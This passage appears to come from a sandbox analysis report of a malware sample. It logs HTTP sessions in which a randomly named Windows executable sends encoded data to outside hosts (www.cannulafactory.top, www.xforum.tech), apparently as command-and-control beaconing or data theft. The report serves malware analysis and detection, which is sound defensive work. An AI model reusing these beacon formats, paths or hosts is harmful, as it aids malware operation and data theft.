df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
            Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            24192.168.2.649749103.224.182.242802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:27.707134962 CEST502OUTGET /647x/?rZwP=sHyxifGPIFN&cLqL3H=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw= HTTP/1.1
            Host: www.xforum.tech
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Sep 2, 2024 09:09:28.337626934 CEST1236INHTTP/1.1 200 OK
            date: Mon, 02 Sep 2024 07:09:28 GMT
            server: Apache
            set-cookie: __tad=1725260968.3389085; expires=Thu, 31-Aug-2034 07:09:28 GMT; Max-Age=315360000
            vary: Accept-Encoding
            content-length: 1539
            content-type: text/html; charset=UTF-8
            connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 78 66 6f 72 75 6d 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 72 5a 77 50 3d 73 48 79 78 69 66 47 50 49 46 4e 26 63 4c 71 4c 33 48 3d 46 6e 61 58 42 6f 78 35 34 2b 61 67 37 67 35 68 75 57 50 45 6d 56 75 42 48 2f 4a 6d 38 79 33 34 33 65 52 63 68 68 4a 79 48 63 78 6a 32 6e 42 73 76 5a 5a 54 54 6f 66 42 44 75 44 72 54 52 78 44 77 4a 53 2f 78 6c 78 71 32 38 77 46 62 43 4a 37 6f 6b 55 70 67 7a 44 5a 70 4f 32 78 73 57 41 6e 5a 43 51 65 35 61 69 71 55 71 49 61 4f 45 4a 7a 4d 33 79 36 [TRUNCATED]
            Data Ascii: <html><head><title>xforum.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.xforum.tech/647x/?rZwP=sHyxifGPIFN&cLqL3H=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body
            Sep 2, 2024 09:09:28.338435888 CEST575INData Raw: 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e
            Data Ascii: bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.xforum.tech/647x/?rZwP=sHyxifGPIFN&cLqL3H=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652o


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            25192.168.2.64975018.183.3.45802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:33.975245953 CEST773OUTPOST /l90v/ HTTP/1.1
            Host: www.cannulafactory.top
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.cannulafactory.top
            Referer: http://www.cannulafactory.top/l90v/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 211
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 66 54 67 75 6c 36 77 7a 79 2f 41 41 76 44 6d 76 72 69 37 37 77 6b 75 79 56 6d 4f 50 59 41 56 45 72 38 37 71 5a 4c 33 57 63 37 34 69 48 30 65 45 62 4a 4b 6e 6a 56 6b 73 58 59 67 6b 50 73 6c 6b 4c 45 6e 33 76 36 44 59 4f 52 6d 61 2f 2f 69 54 52 70 69 58 2f 32 7a 57 6d 75 35 69 61 4f 68 77 44 6e 5a 53 57 50 55 7a 72 77 57 6c 51 6a 77 70 4a 6f 64 42 30 54 6a 2f 6b 31 32 71 7a 38 41 7a 39 66 6d 76 45 46 41 2f 6e 38 67 48 32 59 6e 56 6e 33 65 61 76 48 6b 73 43 4a 56 6c 6c 6c 43 35 77 74 46 34 53 56 2f 4a 6c 57 33 52 63 31 30 41 4a 37 2b 30 4b 67 31 43 33 76 6c 67 59 77 78 50
            Data Ascii: cLqL3H=37FT9IHDPOAKfTgul6wzy/AAvDmvri77wkuyVmOPYAVEr87qZL3Wc74iH0eEbJKnjVksXYgkPslkLEn3v6DYORma//iTRpiX/2zWmu5iaOhwDnZSWPUzrwWlQjwpJodB0Tj/k12qz8Az9fmvEFA/n8gH2YnVn3eavHksCJVlllC5wtF4SV/JlW3Rc10AJ7+0Kg1C3vlgYwxP
            Sep 2, 2024 09:09:34.826061010 CEST1236INHTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Mon, 02 Sep 2024 07:09:34 GMT
            Content-Type: text/html
            Content-Length: 3971
            Connection: close
            ETag: "6526681e-f83"
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
            Sep 2, 2024 09:09:34.826086998 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
            Sep 2, 2024 09:09:34.826098919 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
            Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
            Sep 2, 2024 09:09:34.826210022 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
            Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            26192.168.2.64975118.183.3.45802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:36.521291971 CEST797OUTPOST /l90v/ HTTP/1.1
            Host: www.cannulafactory.top
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.cannulafactory.top
            Referer: http://www.cannulafactory.top/l90v/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 235
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 57 6c 45 6f 64 4c 71 4c 61 33 57 5a 37 34 69 50 55 65 42 55 70 4b 73 6a 56 6f 43 58 5a 63 6b 50 6f 4e 6b 4c 41 6a 33 75 4a 62 5a 4f 42 6d 63 79 66 69 52 66 4a 69 58 2f 32 7a 57 6d 75 64 63 61 4f 70 77 41 58 4a 53 55 74 73 77 30 41 57 6d 52 6a 77 70 66 59 64 46 30 54 6a 4a 6b 30 72 4e 7a 2b 6f 7a 39 61 61 76 45 52 63 38 73 38 67 42 70 49 6d 6c 6d 6b 43 53 32 6c 73 78 4b 34 45 43 6b 30 65 34 78 62 45 69 4f 6d 2f 71 33 47 58 54 63 33 73 79 4a 62 2b 65 49 67 4e 43 6c 34 70 48 58 45 55 73 5a 6d 39 42 78 4d 6a 67 57 30 50 46 6e 4e 52 6d 6f 67 54 43 70 67 3d 3d
            Data Ascii: cLqL3H=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYWlEodLqLa3WZ74iPUeBUpKsjVoCXZckPoNkLAj3uJbZOBmcyfiRfJiX/2zWmudcaOpwAXJSUtsw0AWmRjwpfYdF0TjJk0rNz+oz9aavERc8s8gBpImlmkCS2lsxK4ECk0e4xbEiOm/q3GXTc3syJb+eIgNCl4pHXEUsZm9BxMjgW0PFnNRmogTCpg==
            Sep 2, 2024 09:09:37.363620043 CEST1236INHTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Mon, 02 Sep 2024 07:09:37 GMT
            Content-Type: text/html
            Content-Length: 3971
            Connection: close
            ETag: "6526681e-f83"
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
            Sep 2, 2024 09:09:37.363641024 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
            Sep 2, 2024 09:09:37.363652945 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
            Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
            Sep 2, 2024 09:09:37.363957882 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
            Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            27192.168.2.64975218.183.3.45802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:39.071954966 CEST1810OUTPOST /l90v/ HTTP/1.1
            Host: www.cannulafactory.top
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.cannulafactory.top
            Referer: http://www.cannulafactory.top/l90v/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 1247
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 56 46 45 72 76 44 71 5a 70 66 57 65 37 34 69 46 30 65 41 55 70 4b 4c 6a 56 77 4f 58 5a 52 54 50 75 4a 6b 4b 6a 72 33 70 34 62 5a 46 42 6d 63 37 2f 69 51 52 70 69 6e 2f 77 53 52 6d 75 74 63 61 4f 70 77 41 52 4e 53 43 76 55 77 76 41 57 6c 51 6a 77 74 4a 6f 63 51 30 51 54 5a 6b 30 2f 33 7a 50 49 7a 39 37 71 76 49 43 30 38 7a 4d 67 44 71 49 6d 39 6d 6b 50 4d 32 68 31 64 4b 34 78 6e 6b 32 43 34 39 2f 39 6e 63 31 33 44 72 45 66 2b 45 56 45 4c 4f 64 75 71 46 7a 4e 39 67 72 74 56 53 32 6c 50 65 32 4e 38 6c 38 44 69 66 79 2f 30 6b 6f 64 31 75 51 36 6e 7a 6e 4a 32 75 4f 35 51 45 48 51 33 78 63 49 48 6d 62 46 71 45 6a 4a 78 48 57 67 49 6d 75 6f 75 54 42 54 4f 66 34 64 6a 47 6f 5a 73 53 4a 76 31 34 6f 6b 62 36 33 57 74 6b 55 59 6b 74 63 53 7a 68 58 56 30 45 38 46 79 41 72 37 44 31 7a 73 4f 39 71 6c 77 79 75 52 49 56 71 33 53 41 48 4c 50 6d 2b 34 75 4e 38 41 55 58 51 49 [TRUNCATED]
            Data Ascii: cLqL3H=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYVFErvDqZpfWe74iF0eAUpKLjVwOXZRTPuJkKjr3p4bZFBmc7/iQRpin/wSRmutcaOpwARNSCvUwvAWlQjwtJocQ0QTZk0/3zPIz97qvIC08zMgDqIm9mkPM2h1dK4xnk2C49/9nc13DrEf+EVELOduqFzN9grtVS2lPe2N8l8Dify/0kod1uQ6nznJ2uO5QEHQ3xcIHmbFqEjJxHWgImuouTBTOf4djGoZsSJv14okb63WtkUYktcSzhXV0E8FyAr7D1zsO9qlwyuRIVq3SAHLPm+4uN8AUXQIVLlQoehS4sVyobHnwUocQiHot20+D9VEZPwlYM14WDvpOTfbndUlHOHJJtWQ3fDJm4+vVixi120PH+EAmManV5c/ZxFAy+RKAU0TZk3tTqVmEKuRrXEgFm3HucAp+cpCj1xV8pAfAfK/TWKZEmYgfLur13iasBtr6+K17gy80iNiAawXg1NErXvJSh5DINUsxzE0VbayTxFCuByFJ9s0ZnxSh378P+dmNDWttOU39JZW2hUW86fYoPq2f2souypSFjaTnY/cW5x+cnViGNF1dhxmoZGyoknYECoHpI63U5n/YkqtNTh6JVJm/PEBJlJT5vhJCp0Wat0rhAOsn6t5hxrDFaSravzcLRJtoqTf7IQAJzMM+eFvSZMw2fIbBw+rY4DVLP/KkRCaoC2yuIbD/CfYSFJj+0y7rjd2yW5R35XofhWH3oW8Vj+0lo9cET32QNFyHdht0+vOIcdyK187CodjKPDI+RCVY23YzaX1ulPC4fqxUmZezBuhMgqQ0i/ctpbRWimyxV26NeQzM+nuLm1Ap5JrOloCxuUoxtoyMSXis2+e9Wt6AoA0AhXO7nhHxjkisNAHn8t/nBbeujjDv3HC2Ye0JxTEfW7vzRWpnY68DFZ8mvmxPAOg7YyTNUvPVXWLEbpyoQBSG+SIyYDOsWsu2KxF9ImoPz [TRUNCATED]
            Sep 2, 2024 09:09:39.936499119 CEST1236INHTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Mon, 02 Sep 2024 07:09:39 GMT
            Content-Type: text/html
            Content-Length: 3971
            Connection: close
            ETag: "6526681e-f83"
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
            Sep 2, 2024 09:09:39.936527967 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
            Sep 2, 2024 09:09:39.936542034 CEST448INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
            Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
            Sep 2, 2024 09:09:40.152774096 CEST1224INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            28192.168.2.64975318.183.3.45802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:41.612870932 CEST509OUTGET /l90v/?cLqL3H=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&rZwP=sHyxifGPIFN HTTP/1.1
            Host: www.cannulafactory.top
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Sep 2, 2024 09:09:42.462933064 CEST1236INHTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Mon, 02 Sep 2024 07:09:42 GMT
            Content-Type: text/html
            Content-Length: 3971
            Connection: close
            ETag: "6526681e-f83"
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 